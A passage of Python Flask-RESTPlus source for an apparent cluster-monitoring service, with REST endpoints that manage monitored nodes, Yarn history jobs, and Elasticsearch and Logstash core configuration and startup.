@dmon.route('/v1/overlord/history/yarn/jobs/tasks')
class YarnHistoryServerJobTasks(Resource):
def get(self):
qBDService = dbBDService.query.first()
if qBDService is None:
app.logger.warning('[%s] : [WARN] No entry for Yarn History server found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'No Yarn History server entry found'})
response.status_code = 404
return response
elif qBDService.yarnHEnd == 'None':
app.logger.warning('[%s] : [WARN] Yarn History server not registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Yarn History server not registered'})
response.status_code = 404
return response
else:
try:
yarnJobsStatus, yarnJobs = getYarnJobs(qBDService.yarnHEnd, qBDService.yarnHPort)
except Exception as inst:
app.logger.warning('[%s] : [WARN] Yarn History server not responding at %s with port %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qBDService.yarnHEnd, str(qBDService.yarnHPort))
response = jsonify({'Status': 'Yarn History server not responding'})
response.status_code = 408
return response
try:
jStatTask = getYarnJobTasks(qBDService.yarnHEnd, qBDService.yarnHPort, yarnJobs)
except Exception as inst:
app.logger.warning('[%s] : [WARN] Yarn History server not responding at %s with port %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qBDService.yarnHEnd, str(qBDService.yarnHPort))
response = jsonify({'Status': 'Yarn History server not responding'})
response.status_code = 408
return response
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
response = jsonify({'Status': 'ES not registered'})
response.status_code = 404
app.logger.error('[%s] : [ERROR] ES core not registered into dmon', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
try:
rIndex = dmonESIndexer(qES.hostIP, dmonindex='ystat', dmondoc_type='yarn_jobstasks', docId='yarn-jobstasks', body=jStatTask)
except Exception as inst:
app.logger.error('[%s] : [ERROR] Indexing failed with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error while indexing'})
response.status_code = 503
return response
app.logger.info('[%s] : [INFO] Jobs indexed %s', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(rIndex))
# return rIndex
return jStatTask
@dmon.route('/v1/overlord/nodes/<nodeFQDN>')
@api.doc(params={'nodeFQDN': 'Nodes FQDN'})
class MonitoredNodeInfo(Resource):
def get(self, nodeFQDN):
qNode = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qNode is None:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' not found!'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No node %s found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
return response
else:
response = jsonify({
'NodeName': qNode.nodeFQDN,
'Status': qNode.nStatus,
'IP': qNode.nodeIP,
'Monitored': qNode.nMonitored,
'OS': qNode.nodeOS,
'Key': qNode.nkey,
'Roles': qNode.nRoles,
'LSInstance': qNode.nLogstashInstance
})
response.status_code = 200
app.logger.info(
'[%s] : [INFO] Node info -> Status:%s, IP:%s, Monitored:%s, OS:%s, LSInstance: %s, Key:%s, Roles:%s, ',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qNode.nStatus,
qNode.nodeIP, qNode.nMonitored, qNode.nodeOS, qNode.nLogstashInstance, qNode.nkey,
str(qNode.nRoles))
return response
@api.expect(nodeUpdate)
def put(self, nodeFQDN):
if not request.json:
abort(400)
app.logger.warning('[%s] : [WARN] Malformed request, not json',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
qNode = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
nLSI = ''
if qNode is None:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' not found!'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No node %s found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
return response
else:
qNode.nodeIP = request.json['IP']
qNode.nodeOS = request.json['OS']
if 'Key' not in request.json:
app.logger.warning('[%s] : [WARN] Key not changed for node %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
else:
qNode.nkey = request.json['Key']
qNode.nPass = request.json['Password']
qNode.nUser = request.json['User']
if 'LogstashInstance' not in request.json:
qLSCore = dbNodes.query.first()
if qLSCore is None:
nLSI = 'None'
else:
nLSI = qLSCore.hostIP
else:
nLSI = request.json['LogstashInstance']
app.logger.info('[%s] : [INFO] LS Instance changed for node %s from %s to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
qNode.nodeFQDN, qNode.nLogstashInstance, nLSI)
response = jsonify({'Status': 'Node ' + nodeFQDN + ' updated!'})
qNode.nLogstashInstance = nLSI
response.status_code = 201
return response
def delete(self, nodeFQDN):
qNode = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qNode is None:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' not found'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No node %s found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
return response
else:
nodeID = qNode.nodeFQDN
status = 0
node = []
node.append(qNode.nodeIP)
agentr = AgentResourceConstructor(node, '5222')
if qNode.nStatus:
resourceCheck = agentr.check()
try:
r = requests.get(resourceCheck[0], timeout=DMON_TIMEOUT)
except requests.exceptions.Timeout:
app.logger.warning('[%s] : [WARN] Agent on node %s timedout',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeID)
except requests.exceptions.ConnectionError:
app.logger.error('[%s] : [ERROR] Agent on node %s connection error',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeID)
if r.status_code == 200:
resourceList = agentr.shutdownAgent()
try:
requests.post(resourceList[0], timeout=DMON_TIMEOUT)
except requests.exceptions.Timeout:
app.logger.warning('[%s] : [WARN] Agent on node %s timedout',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeID)
status = 1
except requests.exceptions.ConnectionError:
app.logger.error('[%s] : [ERROR] Agent on node %s connection error',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeID)
status = 2
db.session.delete(qNode)
db.session.commit()
response = jsonify({'Status': status,
'Node': nodeID,
'Message': 'Node succesfully removed'})
response.status_code = 200
return response
@dmon.route('/v1/overlord/nodes/list')
class ClusterNodeListDelete(Resource):
@api.expect(nodeDelList)
def delete(self):
if not request.json:
app.logger.warning('[%s] : [WARN] Malformed request, not json',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
abort(400)
listNodes = request.json['Nodes']
invalidNodes = []
validNodes = {}
validNodesList = []
for n in listNodes:
qNode = dbNodes.query.filter_by(nodeFQDN=n).first()
if qNode is None:
invalidNodes.append(n)
else:
validNodes[n] = qNode.nodeIP
validNodesList.append(qNode.nodeIP)
agentr = AgentResourceConstructor(validNodesList, '5222')
resourceShutDown = agentr.shutdownAgent()
dmon = GreenletRequests(resourceShutDown)
nodeRes = dmon.parallelPost(None)
failedNodes = {}
successNodes = {}
for res in nodeRes:
nodeIP = urlparse(res['Node'])
if res['StatusCode'] == 200:
for k, v in validNodes.iteritems():
if v == nodeIP.hostname:
successNodes[k] = v
else:
for k, v in validNodes.iteritems():
if v == nodeIP.hostname:
failedNodes[k] = v
for nod in validNodesList:
qNodeDel = dbNodes.query.filter_by(nodeIP=nod).first()
db.session.delete(qNodeDel)
db.session.commit()
response = jsonify({'Valid': validNodes, 'Invalid': invalidNodes, 'Stopped': successNodes, 'Unavailable': failedNodes})
response.status_code = 200
dmon.reset()
return response
@dmon.route('/v1/overlord/nodes/<nodeFQDN>/roles')
@api.doc(params={'nodeFQDN': 'Nodes FQDN'})
class ClusterNodeRoles(Resource):
@api.expect(nodeRoles)
def put(self, nodeFQDN): # TODO validate role names
qNode = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qNode is None:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' not found'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No node %s found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
return response
else:
listRoles = request.json['Roles']
qNode.nRoles = ', '.join(map(str, listRoles))
response = jsonify({'Status': 'Node ' + nodeFQDN + ' roles updated!'})
response.status_code = 201
app.logger.info('[%s] : [INFO] Node %s roles %s added.',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN,
str(qNode.nRoles))
return response
# def post(self, nodeFQDN): #TODO -> is this required
# return 'Redeploy configuration for node ' + nodeFQDN + '!'
@dmon.route('/v1/overlord/nodes/<nodeFQDN>/purge')
@api.doc(params={'nodeFQDN': 'Nodes FQDN'})
class PurgeNode(Resource):
def delete(self, nodeFQDN):
qPurge = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qPurge is None:
abort(404)
app.logger.warning('[%s] : [WARN] No node %s found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
lPurge = []
lPurge.append(qPurge.nodeIP)
try:
serviceCtrl(lPurge, qPurge.nUser, qPurge.nPass, 'logstash-forwarder', 'stop')
except Exception as inst:
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Error': 'Stopping LSF!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] While stopping LSF on %s with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN, type(inst),
inst.args)
return response
try:
serviceCtrl(lPurge, qPurge.nUser, qPurge.nPass, 'collectd', 'stop')
except Exception as inst:
response = jsonify({'Error': 'Stopping collectd!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] While stopping collectd on %s with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN, type(inst),
inst.args)
return response
try:
stopAgent(lPurge, qPurge.nUser, qPurge.nPass)
except Exception as inst:
response = jsonify({'Status': 'Error Stopping agent on ' + qPurge.nodeFQDN + '!'})
response.status_code = 500
app.logger.error('[%s] : [INFO] Error stopping agent on %s with exception %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qPurge.nodeFQDN), type(inst), inst.args)
return response
try:
purgeAgent(lPurge, qPurge.nUser, qPurge.nPass)
except Exception as inst:
response = jsonify({'Status': 'Error deleting agent on ' + qPurge.nodeFQDN + '!'})
response.status_code = 500
app.logger.error('[%s] : [INFO] Error deleting agent on %s with exception %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qPurge.nodeFQDN), type(inst), inst.args)
return response
db.session.delete(qPurge)
db.session.commit()
response = jsonify({'Status': 'Node ' + nodeFQDN + ' deleted!'})
response.status_code = 200
app.logger.info('[%s] : [INFO] Node %s deleted',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
return response
@dmon.route('/v1/overlord/core/es/config') # TODO use args for unsafe cfg file upload
class ESCoreConfiguration(Resource):
def get(self): # TODO same for all get config file createfunction
if not os.path.isdir(cfgDir):
response = jsonify({'Error': 'Config dir not found !'})
response.status_code = 404
app.logger.error('[%s] : [ERROR] Config dir not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if not os.path.isfile(os.path.join(cfgDir, 'elasticsearch.yml')):
response = jsonify({'Status': 'Config file not found !'})
response.status_code = 404
app.logger.error('[%s] : [ERROR] ES config dir not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
try:
esCfgfile = open(os.path.join(cfgDir, 'elasticsearch.yml'), 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] ES config file failed to open',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(esCfgfile, mimetype='text/yaml', as_attachment=True)
@api.expect(esCore)
def put(self):
requiredKeys = ['ESClusterName', 'HostFQDN', 'NodeName']
if not request.json:
abort(400)
for key in requiredKeys:
if key not in request.json:
response = jsonify({'Error': 'malformed request, missing key(s)'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Malformed Request, missing key(s)',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qESCore = dbESCore.query.filter_by(hostFQDN=request.json['HostFQDN']).first()
if 'IP' not in request.json:
ip = '127.0.0.1'
else:
ip = request.json['IP']
if 'NodePort' not in request.json:
nodePort = 9200
else:
nodePort = request.json['NodePort']
if 'OS' not in request.json:
os = "unknown"
else:
os = request.json["OS"]
if 'ESCoreHeap' not in request.json:
ESHeap = '4g'
else:
ESHeap = request.json['ESCoreHeap']
check, value = sysMemoryCheck(ESHeap)
if not check:
app.logger.warning('[%s] : [WARN] ES Core service heapsize modified to %s instead of %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(value), str(ESHeap))
ESHeap = value
if 'DataNode' not in request.json:
data = 1
else:
data = request.json['DataNode']
if 'NumOfShards' not in request.json:
shards = 1
else:
shards = request.json['NumOfShards']
if 'NumOfReplicas' not in request.json:
rep = 0
else:
rep = request.json['NumOfReplicas']
if 'FieldDataCacheSize' not in request.json:
fdcs = '20%'
else:
fdcs = request.json['FieldDataCacheSize']
if 'FieldDataCacheExpires' not in request.json:
fdce = '6h'
else:
fdce = request.json['FieldDataCacheExpires']
if 'FieldDataCacheFilterSize' not in request.json:
fdcfs = '20%'
else:
fdcfs = request.json['FieldDataCacheFilterSize']
if 'FieldDataCacheFilterExpires' not in request.json:
fdcfe = '6h'
else:
fdcfe = request.json['FieldDataCacheFilterExpires']
if 'IndexBufferSize' not in request.json:
ibs = '30%'
else:
ibs = request.json['IndexBufferSize']
if 'MinShardIndexBufferSize' not in request.json:
msibs = '12mb'
else:
msibs = request.json['MinShardIndexBufferSize']
if 'MinIndexBufferSize' not in request.json:
mibs = '96mb'
else:
mibs = request.json['MinIndexBufferSize']
test = db.session.query(
dbESCore.hostFQDN).all() # TODO: it always sets the first node to master need to fix future version
if not test:
master = 1
app.logger.info('[%s] : [INFO] First ES host set to Master',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
else:
master = 0
app.logger.info('[%s] : [INFO] ES host set to Slave',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
if qESCore is None:
upES = dbESCore(hostFQDN=request.json["HostFQDN"], hostIP=ip, hostOS=os,
nodeName=request.json["NodeName"], clusterName=request.json["ESClusterName"],
conf='None', nodePort=nodePort, MasterNode=master, DataNode=data,
ESCoreHeap=ESHeap, NumOfShards=shards, NumOfReplicas=rep, FieldDataCacheSize=fdcs,
FieldDataCacheExpires=fdce, FieldDataCacheFilterSize=fdcfs,
FieldDataCacheFilterExpires=fdcfe, IndexBufferSize=ibs, MinShardIndexBufferSize=msibs,
MinIndexBufferSize=mibs)
db.session.add(upES)
db.session.commit()
response = jsonify({'Added': 'ES Config for ' + request.json["HostFQDN"]})
response.status_code = 201
app.logger.info(
'[%s] : [INFO] ES config for %s set to: OS %s, NodeName %s, ClusterName %s, Port %s, Heap %s, Shards %s, Replicas %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), os,
request.json["NodeName"], request.json["ESClusterName"], str(request.json['NodePort']),
ESHeap, shards, rep)
return response
else:
# qESCore.hostFQDN =request.json['HostFQDN'] #TODO document hostIP and FQDN may not change in README.md
qESCore.hostOS = os
qESCore.nodename = request.json['NodeName']
qESCore.clusterName = request.json['ESClusterName']
if 'IP' not in request.json:
# print >> sys.stderr, 'IP unchanged'
app.logger.info('[%s] : [INFO] IP unchanged', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['IP'] == ip:
qESCore.hostIP = ip
if 'NodePort' not in request.json:
# print >> sys.stderr, 'NodePort unchanged'
app.logger.info('[%s] : [INFO] NodePort unchanged', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['NodePort'] == nodePort:
qESCore.nodePort = nodePort
if 'DataNode' not in request.json:
# print >> sys.stderr, 'DataNode unchanged'
app.logger.info('[%s] : [INFO] DataNode unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['DataNode'] == data:
qESCore.DataNode = data
# print >> sys.stderr, 'DataNode set to ' + str(data)
app.logger.info('[%s] : [INFO] DataNode set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(data))
if 'ESCoreHeap' not in request.json:
# print >> sys.stderr, 'ESCoreHeap unchanged'
app.logger.info('[%s] : [INFO] ESCoreHeap unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['ESCoreHeap'] == ESHeap:
qESCore.ESCoreHeap = ESHeap
# print >> sys.stderr, 'ESCoreHeap set to ' + ESHeap
app.logger.info('[%s] : [INFO] ESCoreHeap set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ESHeap)
if 'NumOfShards' not in request.json:
# print >> sys.stderr, 'NumOfShards unchanged'
app.logger.info('[%s] : [INFO] NumOfShards unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['NumOfShards'] == shards:
qESCore.NumOfShards = shards
# print >> sys.stderr, 'NumOfShards set to ' + str(shards)
app.logger.info('[%s] : [INFO] NumOfShard set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(shards))
if 'NumOfReplicas' not in request.json:
# print >> sys.stderr, 'NumOfReplicas unchanged'
app.logger.info('[%s] : [INFO] NumOfReplicas unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['NumOfReplicas'] == rep:
qESCore.NumOfReplicas = rep
# print >> sys.stderr, 'NumOfReplicas set to ' + str(rep)
app.logger.info('[%s] : [INFO] NumOfReplicas set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(rep))
if 'FieldDataCacheSize' not in request.json:
# print >> sys.stderr, 'FieldDataCacheSize unchanged'
app.logger.info('[%s] : [INFO] FieldDataCacheSize unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['FieldDataCacheSize'] == fdcs:
qESCore.FieldDataCacheSize = fdcs
# print >> sys.stderr, 'FieldDataCacheSize set to ' + fdcs
app.logger.info('[%s] : [INFO] FieldDataCacheSize set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), fdcs)
if 'FieldDataCacheExpires' not in request.json:
# print >> sys.stderr, 'FieldDataCacheExpires unchanged'
app.logger.info('[%s] : [INFO] FieldDataCacheExpires unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['FieldDataCacheExpires'] == fdce:
qESCore.FieldDataCacheExpires = fdce
app.logger.info('[%s] : [INFO] FieldDataCacheExpires set to',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), fdce)
# print >> sys.stderr, 'FieldDataCacheExpires set to ' + fdce
if 'FieldDataCacheFilterSize' not in request.json:
# print >> sys.stderr, 'FieldDataCacheFilterSize unchanged'
app.logger.info('[%s] : [INFO] FieldDataCacheFilterSize unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['FieldDataCacheFilterSize'] == fdcfs:
qESCore.FieldDataCacheFilterSize = fdcfs
# print >> sys.stderr, 'FieldDataCacheFilterSize set to ' + fdcfs
app.logger.info('[%s] : [INFO] FieldDataCacheFilterSize set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), fdcfs)
if 'FieldDataCacheFilterExpires' not in request.json:
# print >> sys.stderr, 'FieldDataCacheFilterExpires unchanged'
app.logger.info('[%s] : [INFO] FieldDataCacheFilterExpires unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['FieldDataCacheFilterExpires'] == fdcfe:
qESCore.FieldDataCacheFilterExpires = fdcfe
# print >> sys.stderr, 'FieldDataCacheFilterExpires set to ' + fdcfe
app.logger.info('[%s] : [INFO] FieldDataCacheFilterExpires set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), fdcfe)
if 'IndexBufferSize' not in request.json:
# print >> sys.stderr, 'IndexBufferSize unchanged'
app.logger.info('[%s] : [INFO] IndexBufferSize unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['IndexBufferSize'] == ibs:
qESCore.IndexBufferSize = ibs
# print >> sys.stderr, 'IndexBufferSize set to ' + ibs
app.logger.info('[%s] : [INFO] IndexBufferSize set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ibs)
if 'MinShardIndexBufferSize' not in request.json:
# print >> sys.stderr, 'MinShardIndexBufferSize unchanged'
app.logger.info('[%s] : [INFO] MinShardIndexBufferSize unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['MinShardIndexBufferSize'] == msibs:
qESCore.MinShardIndexBufferSize = msibs
# print >> sys.stderr, 'MinShardIndexBufferSize set to ' + msibs
app.logger.info('[%s] : [INFO] MinShardIndexBufferSize set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), msibs)
if 'MinIndexBufferSize' not in request.json:
# print >> sys.stderr, 'MinIndexBufferSize unchanged'
app.logger.info('[%s] : [INFO] MinIndexBufferSize unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
elif request.json['MinIndexBufferSize'] == mibs:
qESCore.MinIndexBufferSize = mibs
# print >> sys.stderr, 'MinIndexBufferSize set to ' + mibs
app.logger.info('[%s] : [INFO] MinIndexBufferSize set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), mibs)
db.session.commit()
response = jsonify({'Updated': 'ES config for ' + request.json["HostFQDN"]})
response.status_code = 201
app.logger.info('[%s] : [INFO] Updated ES config with %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(request.json))
return response
@dmon.route('/v1/overlord/core/es/<hostFQDN>')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class ESCoreRemove(Resource):
def delete(self, hostFQDN):
qESCorePurge = dbESCore.query.filter_by(hostFQDN=hostFQDN).first()
if qESCorePurge is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
try:
os.kill(qESCorePurge.ESCorePID, signal.SIGTERM)
except:
app.logger.warning('[%s] : [WARN] No ES instance with PID %s', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qESCorePurge.ESCorePID)
db.session.delete(qESCorePurge)
db.session.commit()
response = jsonify({'Status': 'Deleted ES at host ' + hostFQDN})
response.status_code = 200
return response
@dmon.route('/v1/overlord/core/ls/<hostFQDN>')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class LSCoreRemove(Resource):
def delete(self, hostFQDN):
qLSCorePurge = dbSCore.query.filter_by(hostFQDN=hostFQDN).first()
if qLSCorePurge is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
try:
os.kill(qLSCorePurge.LSCorePID, signal.SIGTERM)
except:
app.logger.warning('[%s] : [WARN] No LS instance with PID %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qLSCorePurge.LSCorePID)
db.session.delete(qLSCorePurge)
db.session.commit()
response = jsonify({'Status': 'Deleted LS at host ' + hostFQDN})
response.status_code = 200
return response
@dmon.route('/v1/overlord/core/es')
class ESCoreController(Resource):
def get(self):
hostsAll = db.session.query(dbESCore.hostFQDN, dbESCore.hostIP, dbESCore.hostOS, dbESCore.nodeName,
dbESCore.nodePort,
dbESCore.clusterName, dbESCore.ESCoreStatus, dbESCore.ESCorePID,
dbESCore.MasterNode, dbESCore.DataNode,
dbESCore.NumOfShards, dbESCore.NumOfReplicas, dbESCore.FieldDataCacheSize,
dbESCore.FieldDataCacheExpires, dbESCore.FieldDataCacheFilterSize,
dbESCore.FieldDataCacheFilterExpires, dbESCore.IndexBufferSize,
dbESCore.MinShardIndexBufferSize, dbESCore.MinIndexBufferSize,
dbESCore.ESCoreDebug, dbESCore.ESCoreHeap).all()
resList = []
for hosts in hostsAll:
confDict = {}
confDict['HostFQDN'] = hosts[0]
confDict['IP'] = hosts[1]
confDict['OS'] = hosts[2]
confDict['NodeName'] = hosts[3]
confDict['NodePort'] = hosts[4]
confDict['ESClusterName'] = hosts[5]
if checkPID(hosts[7]):
confDict['Status'] = hosts[6]
confDict['PID'] = hosts[7]
else:
app.logger.warning('[%s] : ES Core service not found at PID %s, setting to failed',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(hosts[7]))
pidESLoc = os.path.join(pidDir, 'elasticsearch.pid')
if os.path.isfile(pidESLoc):
esPIDf = check_proc(pidESLoc)
if checkPID(esPIDf):
confDict['Stats'] = 'detached'
confDict['PID'] = esPIDf
app.logger.warning('[%s] : Detached ES Core service found at PID %s, setting to detached',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(esPIDf))
else:
#hosts.ESCorePID = 0
#hosts.ESCoreStatus = 'unknown'
# todo status detached if pid only in file not in sqlite, read pid from file
confDict['Status'] = 'unknown' #TODO: Document failed message if PID is not assigned to an ES Instance
confDict['PID'] = 0
app.logger.warning('[%s] : ES Core service not found, setting to unknown',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
confDict['MasterNode'] = hosts[8]
confDict['DataNode'] = hosts[9]
confDict['NumOfShards'] = hosts[10]
confDict['NumOfReplicas'] = hosts[11]
confDict['FieldDataCacheSize'] = hosts[12]
confDict['FieldDataCacheExpire'] = hosts[13]
confDict['FieldDataCacheFilterSize'] = hosts[14]
confDict['FieldDataCacheFilterExpires'] = hosts[15]
confDict['IndexBufferSize'] = hosts[16]
confDict['MinShardIndexBufferSize'] = hosts[17]
confDict['MinIndexBufferSize'] = hosts[18]
confDict['ESCoreDebug'] = hosts[19]
confDict['ESCoreHeap'] = hosts[20]
resList.append(confDict)
response = jsonify({'ES Instances': resList})
response.status_code = 200
return response
def post(self):
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
esTemp = os.path.join(tmpDir, 'elasticsearch.tmp') # tmpDir+"/collectd.tmp"
esfConf = os.path.join(cfgDir, 'elasticsearch.yml')
qESCore = dbESCore.query.filter_by(MasterNode=1).first() # TODO -> curerntly only generates config file for master node
if qESCore is None:
response = jsonify({"Status": "No master ES instances found!"})
response.status_code = 500
return response
if checkPID(qESCore.ESCorePID) is True:
subprocess.call(["kill", "-15", str(qESCore.ESCorePID)])
try:
template = templateEnv.get_template(esTemp)
# print >>sys.stderr, template
except:
response = jsonify({'Status': 'Error', 'Message': 'Tempalte file unavailable!'})
response.status_code = 500
app.logger.error("[%s] : [ERROR] Cannot load es core template at location %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), esTemp)
return response
infoESCore = {"clusterName": qESCore.clusterName, "nodeName": qESCore.nodeName, "esLogDir": logDir,
"MasterNode": qESCore.MasterNode, "DataNode": qESCore.DataNode,
"NumberOfShards": qESCore.NumOfShards, "NumberOfReplicas": qESCore.NumOfReplicas,
"IndexBufferSize": qESCore.IndexBufferSize,
"MinShardIndexBufferSize": qESCore.MinShardIndexBufferSize,
"MinIndexBufferSize": qESCore.MinIndexBufferSize,
"FieldDataCacheSize": qESCore.FieldDataCacheSize,
"FieldDataCacheExpires": qESCore.FieldDataCacheExpires,
"FieldDataCacheFilterSize": qESCore.FieldDataCacheFilterSize,
"FieldDataCacheFilterExpires": qESCore.FieldDataCacheFilterExpires,
"ESCoreDebug": qESCore.ESCoreDebug}
esConf = template.render(infoESCore)
qESCore.conf = esConf
# print >>sys.stderr, esConf
db.session.commit()
esCoreConf = open(esfConf, "w+")
esCoreConf.write(esConf)
esCoreConf.close()
# TODO find better solution
os.system('rm -rf /opt/elasticsearch/config/elasticsearch.yml')
os.system('cp ' + esfConf + ' /opt/elasticsearch/config/elasticsearch.yml ')
os.environ['ES_HEAP_SIZE'] = qESCore.ESCoreHeap
esPid = 0
try:
esPid = subprocess.Popen('/opt/elasticsearch/bin/elasticsearch',
stdout=subprocess.PIPE, close_fds=True).pid # TODO: Try -p to set pid file location and -d for daemon
except Exception as inst:
# print >> sys.stderr, 'Error while starting elasticsearch'
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
app.logger.error("[%s] : [ERROR] Cannot start ES Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot start ES Core'})
response.status_code = 500
return response
qESCore.ESCorePID = esPid
qESCore.ESCoreStatus = 'Running'
# ES core pid location
pidESLoc = os.path.join(pidDir, 'elasticsearch.pid')
try:
esPIDFile = open(pidESLoc, 'w+')
